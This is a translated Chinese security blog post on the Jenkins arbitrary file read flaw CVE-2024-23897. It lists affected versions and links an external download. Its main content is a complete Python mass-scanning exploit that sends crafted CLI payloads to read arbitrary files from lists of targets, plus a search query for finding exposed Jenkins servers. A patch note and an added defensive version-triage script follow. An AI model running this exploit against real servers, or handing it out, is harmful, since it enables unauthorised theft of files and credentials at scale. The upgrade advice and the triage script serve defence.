01 Vulnerability details
02 Affected versions
Jenkins version <= 2.441
LTS version <= 2.426.2
03 Mass scanning
Mass scanning script
https://pan.baidu.com/s/1eADF1EqdQ_eRiLvQhjtOpg?pwd=r9ku
```python
from urllib.parse import urlparse
import uuid
import threading
import requests
import time


# Terminal output colours
class TerminalColor:
    HEADER = '\033[95m'
    OKBLUE = '\033[94m'
    OKCYAN = '\033[96m'
    OKGREEN = '\033[92m'
    WARNING = '\033[93m'
    FAIL = '\033[91m'
    ENDC = '\033[0m'
    BOLD = '\033[1m'
    UNDERLINE = '\033[4m'


def create_session_id():
    return str(uuid.uuid4())


def save_vulnerable_url(url):
    # `filename` is set in the __main__ block below
    with open(filename, "a") as file:
        file.write(url + "\n")


def validate_url(website_url):
    if not website_url.startswith(('http://', 'https://')):
        website_url = 'http://' + website_url
    return website_url


def perform_request_upload(session, url, session_id, action, file_content=None):
    try:
        response = session.post(
            url + '/cli?remoting=false',
            headers={"Session": session_id, "Side": action},
            data=file_content,
            allow_redirects=False,
            timeout=5
        )
    except:
        pass


def perform_request_download(session, url, session_id, action, file_content=None):
    try:
        response = session.post(
            url + '/cli?remoting=false',
            headers={"Session": session_id, "Side": action},
            data=file_content,
            allow_redirects=False,
            timeout=5
        )
        if response.ok:
            print(f"{TerminalColor.OKGREEN}存在漏洞地址: {urlparse(url).netloc} {TerminalColor.ENDC} {response.text}")
            save_vulnerable_url(urlparse(url).netloc)
        else:
            print(f"{TerminalColor.WARNING}地址 {urlparse(url).netloc} 返回:{TerminalColor.ENDC} {response.status_code}")
    except:
        pass


def stage_exploit(target, file_to_access):
    session_id = create_session_id()
    session = requests.Session()
    safe_url = validate_url(target)
    target_parts = urlparse(safe_url)
    action_url = f"{target_parts.scheme}://{target_parts.netloc}"
    exploit_data = (b'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@'
                    + file_to_access.encode()
                    + b'\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03')
    # The upload and download halves of the CLI session are sent concurrently
    uploader = threading.Thread(target=perform_request_upload,
                                args=(session, action_url, session_id, "upload", exploit_data,))
    downloader = threading.Thread(target=perform_request_download,
                                  args=(session, action_url, session_id, "download",))
    uploader.start()
    downloader.start()
    uploader.join()
    downloader.join()


def handle_targets(target_file, desired_file):
    with open(target_file, 'r') as f:
        for target in f:
            print(f"{TerminalColor.OKCYAN}正在处理目标:{TerminalColor.ENDC} {target.strip()}")
            stage_exploit(target.strip(), desired_file)


def run_script():
    import argparse
    parser = argparse.ArgumentParser(description='CVE-2024-23897漏洞扫描脚本。')
    parser.add_argument('-t', '--target', help='要扫描的目标 URL。')
    parser.add_argument('-T', '--targetfile', help='包含要扫描的 URL 的txt文件。')
    parser.add_argument('-f', '--filepath', required=True, help='读取文件的路径')
    opts = parser.parse_args()
    if opts.target:
        stage_exploit(opts.target, opts.filepath)
    elif opts.targetfile:
        handle_targets(opts.targetfile, opts.filepath)
    else:
        print(f"{TerminalColor.FAIL}错误:{TerminalColor.ENDC} 必须指定目标 URL 或目标文件。")


if __name__ == '__main__':
    timestamp = time.strftime("%Y%m%d-%H%M%S")
    filename = f"{timestamp}_存在漏洞.txt"
    run_script()
```
04 Syntax
app="Jenkins"
Jenkins 2.442 and LTS 2.426.3 disable the affected command-parser feature. Updating to these versions is recommended to resolve the vulnerability.
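For the defensive side of the same advisory, the following is an added example (not part of the original article) that triages an asset inventory against the affected ranges stated above: weekly <= 2.441 and LTS <= 2.426.2, i.e. anything below the fixed releases 2.442 and 2.426.3. The inventory is a constructed sample of hostnames and the version each server reports in its `X-Jenkins` response header; the hostnames are placeholders.

```python
"""Triage a Jenkins inventory against the CVE-2024-23897 affected range.

Fixed releases per the advisory: weekly 2.442 and LTS 2.426.3, so anything
below those (weekly <= 2.441, LTS <= 2.426.2) is still affected.
"""
from typing import List, Tuple

FIXED_WEEKLY = (2, 442)      # first fixed weekly release
FIXED_LTS = (2, 426, 3)      # first fixed LTS release


def parse_version(text: str) -> Tuple[int, ...]:
    """Turn '2.441' or '2.426.2' into a comparable tuple of ints."""
    parts = text.strip().split(".")
    if not parts or not all(p.isdigit() for p in parts):
        raise ValueError(f"unrecognised Jenkins version: {text!r}")
    return tuple(int(p) for p in parts)


def is_affected(text: str) -> bool:
    """True if the given Jenkins version is in the affected range."""
    version = parse_version(text)
    # LTS releases carry a third component (2.426.2); weekly ones have two (2.441).
    if len(version) == 3:
        return version < FIXED_LTS
    return version < FIXED_WEEKLY


# Constructed sample inventory: (hostname, value of the X-Jenkins response header).
INVENTORY = [
    ("ci-a.example.internal", "2.441"),
    ("ci-b.example.internal", "2.442"),
    ("ci-c.example.internal", "2.426.2"),
    ("ci-d.example.internal", "2.426.3"),
    ("ci-e.example.internal", "2.440.1"),
    ("ci-f.example.internal", "2.414.3"),
]


def triage(inventory: List[Tuple[str, str]]) -> List[str]:
    """Return the hosts whose version falls in the affected range."""
    return [host for host, version in inventory if is_affected(version)]


if __name__ == "__main__":
    for host in triage(INVENTORY):
        print(f"{host}: affected, upgrade to 2.442 / LTS 2.426.3")
```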
Originally published on the WeChat public account 棉花糖网络安全圈: Mass scanning script - Jenkins arbitrary file read (CVE-2024-23897)
Disclaimer: The programs (methods) covered in this article may be offensive in nature and are provided solely for security research and teaching. Readers who use this information for any other purpose bear full legal and joint liability; this site assumes no legal or joint liability. If there are any questions, contact us by e-mail (an enterprise or otherwise valid mailbox is recommended to avoid the mail being blocked; contact details are on the home page).